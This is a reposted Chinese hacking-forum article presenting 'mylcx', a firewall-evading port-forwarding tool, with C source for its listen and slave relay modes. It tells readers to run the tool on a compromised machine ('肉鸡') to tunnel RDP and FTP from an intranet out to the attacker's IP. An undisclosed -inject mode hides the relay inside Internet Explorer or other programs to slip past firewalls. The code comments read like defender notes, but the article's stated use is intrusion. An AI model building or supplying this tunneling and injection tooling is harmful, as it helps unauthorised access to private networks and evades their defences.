
【转】mylcx 穿墙版

作者:gaohui

mylcx -listen 这个命令跟lcx一样
mylcx -slave 本机端口 远程ip 远程端口
即把本机端口映射到远程ip的一个端口上

在本机执行:mylcx -listen 5000 21
在肉鸡上执行:mylcx -slave 21 你的ip 5000
然后连接ftp 127.0.0.1 就可以登录远程的ftp了

简单说下第三个参数吧

mylcx -inject port1 remoteip remoteport [-path exepath]

port1是被映射的端口

remoteip 是映射的远程机器

remoteport是远程端口

比如我们想连对方的3389端口,而对方又是内网没法直接连,并且对方又有防火墙,普通的lcx没法转发,那就在对方机器上运行

mylcx -inject 3389 56.78.90.12 5000

然后在自己的机器上运行

mylcx -listen 5000 5001

最后打开mstsc,输入127.0.0.1:5001即可连接对方3389端口。

默认的mylcx 会插入到C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE中去运行,我们也可以指定他插入到别的程序里面运行,只要这个程序能允许访问网络,比如说d:\tools\flashfxp.exe,那我们可以在对方机器上运行

mylcx -inject 3389 56.78.90.12 5000 -path “d:\tools\flashfxp.exe”

就可以了,尽情发挥吧。需要注意一点的是,不是所有程序都可以用来插入的,有些程序可能会插入失败或者插入后运行失败,都是有可能的。

 

附上源码:(嘿嘿,英文不好,变量名都是乱起,而且比较乱,见笑了)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "Ws2_32")

/*
 * Process-wide event handle used to end a relay session. It is created by
 * lcxlisten()/lcxslave(), signalled by s1tos2() when one direction of the
 * relay stops, and waited on by the function that started the session.
 * Being a single global, it is shared by both relay threads of a session.
 */
HANDLE hevent;

 

/*
 * Argument block for one relay thread: s1tos2() receives from s1 and
 * forwards what it read to s2. Two of these, with the sockets swapped,
 * give a bidirectional relay.
 */
typedef struct _s1ands2
{
SOCKET s1;
SOCKET s2;
} s1ands2;

/*
 * Parameter record describing one relay configuration (mode, ports and
 * remote endpoint). Nothing in the listing on this page reads or writes it.
 * NOTE(review): presumably it carries the settings for the -inject mode the
 * article describes, whose source is not included here; confirm.
 */
typedef struct _info{
int listenorslave; //1-listen 2-slave
unsigned short listen_port1;   /* first listening port (listen mode) */
unsigned short listen_port2;   /* second listening port (listen mode) */
unsigned short slave_local;    /* local port to connect to (slave mode) */
char remoteip[16];             /* room for a dotted-quad IPv4 string plus NUL */
unsigned short remoteport;     /* remote port to connect to (slave mode) */
} info;

 

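/*
 * Relay thread: copy bytes from p->s1 to p->s2 until the source closes or
 * either socket reports an error, then signal hevent so the function that
 * owns the session can tear it down.
 *
 * p points to an s1ands2 owned by the caller; both socket handles are copied
 * out before the first blocking call. The relay forwards data verbatim and
 * logs only the byte count of each chunk to stdout.
 *
 * Always returns 0.
 */
DWORD WINAPI s1tos2(LPVOID p)
{
    s1ands2 *pair = (s1ands2 *)p;
    SOCKET from = pair->s1;
    SOCKET to = pair->s2;
    char buff[2048];

    for (;;) {
        int received = recv(from, buff, (int)sizeof(buff), 0);
        /* Socket errors are reported through WSAGetLastError(); the value is
         * only meaningful when the call above failed, but it is still printed
         * to keep the original trace format. */
        int errorcode = WSAGetLastError();
        int sent = 0;

        if (received <= 0) {
            /* 0 means the peer closed cleanly, a negative value is an error. */
            SetEvent(hevent);
            return 0;
        }
        printf("%d bytes=%d\n", errorcode, received);

        /* send() may accept fewer bytes than requested; loop until the whole
         * chunk has been forwarded so no data is silently dropped. */
        while (sent < received) {
            int n = send(to, buff + sent, received - sent, 0);

            if (n <= 0) {
                SetEvent(hevent);
                return 0;
            }
            sent += n;
        }
    }
}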
/*

DWORD WINAPI s2tos1(LPVOID p)
{
s1ands2* temp=(s1ands2*)p;
char buff[2048]={0};
int bytesdone;

SOCKET s1,s2;
s1=temp->s1;
s2=temp->s2;
while(1)
{
bytesdone=recv(s2,buff,2048,0);
send(s1,buff,bytesdone,0);
}

return 0;

}
*/
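/*
 * Listener half of the relay: accept one TCP connection on port p1 and one
 * on port p2, then copy bytes between the two in both directions until
 * either side stops.
 *
 * Both listening sockets are bound to INADDR_ANY and the relay does no
 * authentication, so any host that can reach p1 or p2 can attach to it;
 * an unexpected process holding two listening ports and splicing their
 * peers together is what this looks like from the host side.
 *
 * The event is created before the worker threads start and the workers are
 * joined before it is closed, so a worker can never signal a missing or
 * already-closed handle, and no worker from this session survives into the
 * next call.
 *
 * Always returns 0 (the caller ignores the value); failures are reported on
 * stdout.
 */
int lcxlisten(unsigned short p1,unsigned short p2)
{
    SOCKET s1 = INVALID_SOCKET, s2 = INVALID_SOCKET;
    SOCKET rs1 = INVALID_SOCKET, rs2 = INVALID_SOCKET;
    struct sockaddr_in addr1 = {0}, addr2 = {0};
    struct sockaddr_in raddr1 = {0}, raddr2 = {0};
    int len1 = sizeof(raddr1);
    int len2 = sizeof(raddr2);
    s1ands2 temp1, temp2;
    HANDLE threads[2] = {NULL, NULL};
    DWORD nthreads = 0;
    DWORD i;

    hevent = NULL;

    addr1.sin_family = AF_INET;
    addr1.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
    addr1.sin_port = htons(p1);

    addr2.sin_family = AF_INET;
    addr2.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
    addr2.sin_port = htons(p2);

    s1 = socket(AF_INET, SOCK_STREAM, 0);
    s2 = socket(AF_INET, SOCK_STREAM, 0);
    if (s1 == INVALID_SOCKET || s2 == INVALID_SOCKET) {
        printf("socket failed: %d\n", WSAGetLastError());
        goto cleanup;
    }

    if (bind(s1, (const struct sockaddr *)&addr1, sizeof(addr1)) == SOCKET_ERROR ||
        bind(s2, (const struct sockaddr *)&addr2, sizeof(addr2)) == SOCKET_ERROR) {
        printf("bind failed: %d\n", WSAGetLastError());
        goto cleanup;
    }

    if (listen(s1, 5) == SOCKET_ERROR || listen(s2, 5) == SOCKET_ERROR) {
        printf("listen failed: %d\n", WSAGetLastError());
        goto cleanup;
    }

    printf("waiting on port %d...\n", p1);
    rs1 = accept(s1, (struct sockaddr *)&raddr1, &len1);
    if (rs1 == INVALID_SOCKET) {
        printf("accept failed: %d\n", WSAGetLastError());
        goto cleanup;
    }
    printf("%s connected\n", inet_ntoa(raddr1.sin_addr));

    printf("wating on port %d...\n", p2);
    rs2 = accept(s2, (struct sockaddr *)&raddr2, &len2);
    if (rs2 == INVALID_SOCKET) {
        printf("accept failed: %d\n", WSAGetLastError());
        goto cleanup;
    }
    printf("go...\n");

    /* Auto-reset, initially non-signalled; must exist before any worker can
     * reach SetEvent(). */
    hevent = CreateEvent(NULL, FALSE, FALSE, NULL);
    if (hevent == NULL) {
        printf("CreateEvent failed: %lu\n", (unsigned long)GetLastError());
        goto cleanup;
    }

    temp1.s1 = rs1;
    temp1.s2 = rs2;
    temp2.s1 = rs2;
    temp2.s2 = rs1;

    threads[nthreads] = CreateThread(NULL, 0, s1tos2, &temp1, 0, NULL);
    if (threads[nthreads] != NULL) {
        nthreads++;
    }
    threads[nthreads] = CreateThread(NULL, 0, s1tos2, &temp2, 0, NULL);
    if (threads[nthreads] != NULL) {
        nthreads++;
    }

    if (nthreads == 2) {
        WaitForSingleObject(hevent, INFINITE);
        printf("end waiting1\n");
    } else {
        printf("CreateThread failed: %lu\n", (unsigned long)GetLastError());
    }

cleanup:
    /* Closing the connected sockets makes the blocking recv()/send() in the
     * workers fail, which is what lets them exit. */
    if (rs1 != INVALID_SOCKET) {
        shutdown(rs1, SD_BOTH);
        closesocket(rs1);
    }
    if (rs2 != INVALID_SOCKET) {
        shutdown(rs2, SD_BOTH);
        closesocket(rs2);
    }

    /* temp1/temp2 live on this stack frame and hevent is about to be closed,
     * so wait for the workers before going any further. */
    if (nthreads > 0) {
        WaitForMultipleObjects(nthreads, threads, TRUE, INFINITE);
    }
    for (i = 0; i < nthreads; i++) {
        CloseHandle(threads[i]);
    }

    if (hevent != NULL) {
        CloseHandle(hevent);
        hevent = NULL;
    }
    if (s1 != INVALID_SOCKET) {
        closesocket(s1);
    }
    if (s2 != INVALID_SOCKET) {
        closesocket(s2);
    }
    return 0;
}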

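/*
 * Connecting half of the relay: open one TCP connection to
 * remoteip:remoteport and one to 127.0.0.1:local, then copy bytes between
 * them in both directions until either side stops.
 *
 * Both connections are initiated from this host, so inbound-only filtering
 * does not see the loopback-only service being exposed. Egress filtering and
 * monitoring for a process that pairs a long-lived outbound session with a
 * loopback connection to a local service port are the controls that apply.
 *
 * remoteip must be a dotted-quad IPv4 string. Connection failures are silent
 * because the caller retries in a loop.
 *
 * Always returns 0 (the caller ignores the value).
 */
int lcxslave(unsigned short local,char* remoteip,unsigned short remoteport)
{
    WSADATA wsa;
    SOCKET s1 = INVALID_SOCKET, s2 = INVALID_SOCKET;
    struct sockaddr_in addr1 = {0}, addr2 = {0};
    s1ands2 temp, temp2;
    HANDLE threads[2] = {NULL, NULL};
    DWORD nthreads = 0;
    DWORD i;

    if (WSAStartup(MAKEWORD(2,2), &wsa) != 0) {
        return 0;
    }
    hevent = NULL;

    if (remoteip == NULL) {
        goto cleanup;
    }

    addr1.sin_family = AF_INET;
    addr1.sin_addr.S_un.S_addr = inet_addr(remoteip);
    addr1.sin_port = htons(remoteport);
    if (addr1.sin_addr.S_un.S_addr == INADDR_NONE) {
        /* inet_addr() could not parse the string; do not connect to the
         * all-ones address it returns. */
        goto cleanup;
    }

    s1 = socket(AF_INET, SOCK_STREAM, 0);
    if (s1 == INVALID_SOCKET ||
        connect(s1, (const struct sockaddr *)&addr1, sizeof(addr1)) == SOCKET_ERROR) {
        goto cleanup;
    }

    addr2.sin_family = AF_INET;
    addr2.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
    addr2.sin_port = htons(local);

    s2 = socket(AF_INET, SOCK_STREAM, 0);
    if (s2 == INVALID_SOCKET ||
        connect(s2, (const struct sockaddr *)&addr2, sizeof(addr2)) == SOCKET_ERROR) {
        goto cleanup;
    }

    /* Auto-reset, initially non-signalled; must exist before any worker can
     * reach SetEvent(). */
    hevent = CreateEvent(NULL, FALSE, FALSE, NULL);
    if (hevent == NULL) {
        goto cleanup;
    }

    temp.s1 = s1;
    temp.s2 = s2;
    temp2.s1 = s2;
    temp2.s2 = s1;

    threads[nthreads] = CreateThread(NULL, 0, s1tos2, &temp, 0, NULL);
    if (threads[nthreads] != NULL) {
        nthreads++;
    }
    threads[nthreads] = CreateThread(NULL, 0, s1tos2, &temp2, 0, NULL);
    if (threads[nthreads] != NULL) {
        nthreads++;
    }

    if (nthreads == 2) {
        WaitForSingleObject(hevent, INFINITE);
        printf("end waiting2\n");
    }

cleanup:
    /* Closing the sockets makes the blocking recv()/send() in the workers
     * fail, which is what lets them exit. */
    if (s1 != INVALID_SOCKET) {
        shutdown(s1, SD_BOTH);
        closesocket(s1);
    }
    if (s2 != INVALID_SOCKET) {
        shutdown(s2, SD_BOTH);
        closesocket(s2);
    }

    /* temp/temp2 live on this stack frame and hevent is about to be closed,
     * so wait for the workers before going any further. */
    if (nthreads > 0) {
        WaitForMultipleObjects(nthreads, threads, TRUE, INFINITE);
    }
    for (i = 0; i < nthreads; i++) {
        CloseHandle(threads[i]);
    }

    if (hevent != NULL) {
        CloseHandle(hevent);
        hevent = NULL;
    }

    /* Balances the WSAStartup() at the top of this call. */
    WSACleanup();
    return 0;
}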

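/*
 * Parse a decimal TCP port in the range 1-65535.
 * Returns 1 and stores the value in *out on success, 0 on any malformed or
 * out-of-range input (empty string, sign, trailing characters, 0, > 65535).
 */
static int parse_port(const char *text, unsigned short *out)
{
    char *end = NULL;
    unsigned long value;

    /* Require a leading digit: strtoul() would otherwise accept whitespace
     * and a sign and wrap negative numbers. */
    if (text == NULL || text[0] < '0' || text[0] > '9') {
        return 0;
    }
    value = strtoul(text, &end, 10);
    if (*end != '\0' || value == 0 || value > 65535UL) {
        return 0;
    }
    *out = (unsigned short)value;
    return 1;
}

/*
 * Entry point. Two modes are handled in this listing:
 *   -listen port1 port2                  run lcxlisten() in a loop
 *   -slave  localport remoteip remoteport run lcxslave() in a loop
 * The -inject mode described in the article is not part of this source.
 *
 * Each mode restarts its relay one second after a session ends and never
 * returns. The argument count and port values are validated before use;
 * argv[2..4] are no longer read when they were not supplied.
 *
 * Returns 0 after printing usage for a missing or unknown mode, 1 for
 * malformed arguments or a Winsock start-up failure.
 */
int main(int argc, char* argv[])
{
    static const char usage[] =
        "usage:mylcx.exe -listen port1 port2\n"
        "mylcx.exe -slave localport remoteip remoteport\n";
    WSADATA wsa;
    unsigned short port_a = 0;
    unsigned short port_b = 0;
    int listen_mode;

    if (argc < 2) {
        printf("%s", usage);
        return 0;
    }

    listen_mode = (strcmp(argv[1], "-listen") == 0);
    if (!listen_mode && strcmp(argv[1], "-slave") != 0) {
        printf("%s", usage);
        return 0;
    }

    if (listen_mode) {
        if (argc < 4 ||
            !parse_port(argv[2], &port_a) ||
            !parse_port(argv[3], &port_b)) {
            printf("%s", usage);
            return 1;
        }
    } else {
        if (argc < 5 ||
            !parse_port(argv[2], &port_a) ||
            !parse_port(argv[4], &port_b)) {
            printf("%s", usage);
            return 1;
        }
    }

    if (WSAStartup(MAKEWORD(2,2), &wsa) != 0) {
        printf("WSAStartup failed\n");
        return 1;
    }

    for (;;) {
        if (listen_mode) {
            lcxlisten(port_a, port_b);
        } else {
            lcxslave(port_a, argv[3], port_b);
        }
        /* Pause before re-arming so a persistent failure does not spin. */
        Sleep(1000);
    }
}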
